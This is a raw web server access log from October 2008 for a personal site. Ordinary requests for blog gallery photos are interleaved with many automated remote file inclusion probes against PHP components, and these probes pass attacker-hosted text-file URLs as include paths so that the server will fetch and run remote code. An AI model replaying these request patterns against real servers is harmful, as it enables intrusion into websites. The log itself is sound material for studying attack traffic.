98.136.50.138 - - [26/Oct/2008:09:43:12 -0700] "GET /logs/access_080724.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:43:12 -0700] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:43:13 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://business-buket.ru/kx.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:43:14 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:43:18 -0700] "GET /logs/access_080920.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:43:18 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:43:18 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:43:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-152_0.jpg HTTP/1.1" 200 384684 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:43:58 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0063.jpg HTTP/1.1" 200 443016 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
83.149.125.218 - - [26/Oct/2008:09:44:11 -0700] "GET /logs/access_080724.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lafontaineauxbijoux.com/catalog//images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.125.218 - - [26/Oct/2008:09:44:11 -0700] "GET /logs/access_080404.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lafontaineauxbijoux.com/catalog//images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.247.65.114 - - [26/Oct/2008:09:44:25 -0700] "GET /logs/access_080927.log/phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:44:36 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/036.jpg HTTP/1.1" 200 503426 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:44:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-121_1.jpg HTTP/1.1" 200 342667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:00 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:04 -0700] "GET /logs/access_080201.log//Neos_Chronos/header.php?base_folder=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:06 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:07 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.58.188 - - [26/Oct/2008:09:45:12 -0700] "GET /logs/access_080920.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:13 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.58.188 - - [26/Oct/2008:09:45:13 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:14 -0700] "GET /embed/day.php?path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-014_3.jpg HTTP/1.1" 200 495384 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:45:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0071.jpg HTTP/1.1" 200 451017 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:30 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.108.193.138 - - [26/Oct/2008:09:45:30 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:45:32 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:45:34 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:45:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-133.jpg HTTP/1.1" 200 414698 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
74.6.22.187 - - [26/Oct/2008:09:45:47 -0700] "GET /logs/access_080202.log HTTP/1.0" 200 902881 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:45:53 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:45:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-043_3.jpg HTTP/1.1" 200 407435 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:46:02 -0700] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:09:46:14 -0700] "GET /logs/access_080907.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:46:14 -0700] "GET /logs/access_080823.log/includes/useragent.inc.php?prefix=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:46:15 -0700] "GET /logs/access_080830.log/errors.php?error=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:46:16 -0700] "GET /errors.php?error=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:46:19 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0021.jpg HTTP/1.1" 200 360229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:46:19 -0700] "GET /logs/access_080723.log/errors.php?error=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:46:33 -0700] "GET /logs/access_080820.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:46:46 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:46:46 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:46:46 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:46:50 -0700] "GET /logs/access_080410.log%20%20//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.108.193.138 - - [26/Oct/2008:09:46:52 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:46:53 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:46:55 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:46:57 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:46:57 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:46:59 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:46:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0048.jpg HTTP/1.1" 200 344028 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:46:59 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:47:03 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:47:03 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:09:47:06 -0700] "GET /logs//language.inc.php?langs_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:09:47:07 -0700] "GET /language.inc.php?langs_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:47:09 -0700] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:47:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-197.jpg HTTP/1.1" 200 258138 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
66.79.163.110 - - [26/Oct/2008:09:47:16 -0700] "GET /logs/access.log//admin/classes/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:47:16 -0700] "GET /logs//admin/classes/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:09:47:16 -0700] "GET /logs/access_080329.log//admin/classes/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:47:24 -0700] "GET /logs/access_080430.log%20%20//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:47:28 -0700] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:47:32 -0700] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:47:32 -0700] "GET /logs/access_080823.log//config/dbutil.bck.php?confdir=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:47:32 -0700] "GET /config/dbutil.bck.php?confdir=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:47:38 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:47:38 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:47:52 -0700] "GET /logs/access_080705.log//config/dbutil.bck.php?confdir=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:48:04 -0700] "GET /logs/access_080913.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:48:04 -0700] "GET /logs/access_080913.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:48:04 -0700] "GET /classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:48:04 -0700] "GET /classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:48:04 -0700] "GET /logs/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:48:04 -0700] "GET /logs/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:48:10 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:48:10 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:48:12 -0700] "GET /logs//language.inc.php?langs_dir=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:09:48:13 -0700] "GET /language.inc.php?langs_dir=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:48:24 -0700] "GET /logs/homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:48:25 -0700] "GET /homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:48:28 -0700] "GET /logs/access_080724.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:48:32 -0700] "GET /logs/access_080820.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:48:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-032_2.jpg HTTP/1.1" 200 445739 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:48:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-270.jpg HTTP/1.1" 200 299263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:48:41 -0700] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:00 -0700] "GET /logs//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:00 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:00 -0700] "GET /config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:00 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:49:01 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:01 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:02 -0700] "GET /logs/access_080115.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [26/Oct/2008:09:49:03 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [26/Oct/2008:09:49:04 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:06 -0700] "GET /logs/access_080529.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:49:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-030_3.jpg HTTP/1.1" 200 544494 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:49:11 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:11 -0700] "GET /include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:11 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.88.49.22 - - [26/Oct/2008:09:49:11 -0700] "GET /logs//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.88.49.22 - - [26/Oct/2008:09:49:11 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.88.49.22 - - [26/Oct/2008:09:49:12 -0700] "GET /config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-164_1.jpg HTTP/1.1" 200 249138 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
216.120.233.18 - - [26/Oct/2008:09:49:30 -0700] "GET /config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:30 -0700] "GET /logs//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:35 -0700] "GET /logs/access_080908.log//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:49:38 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 200 94861 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:49:40 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-032_1.jpg HTTP/1.1" 200 238931 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
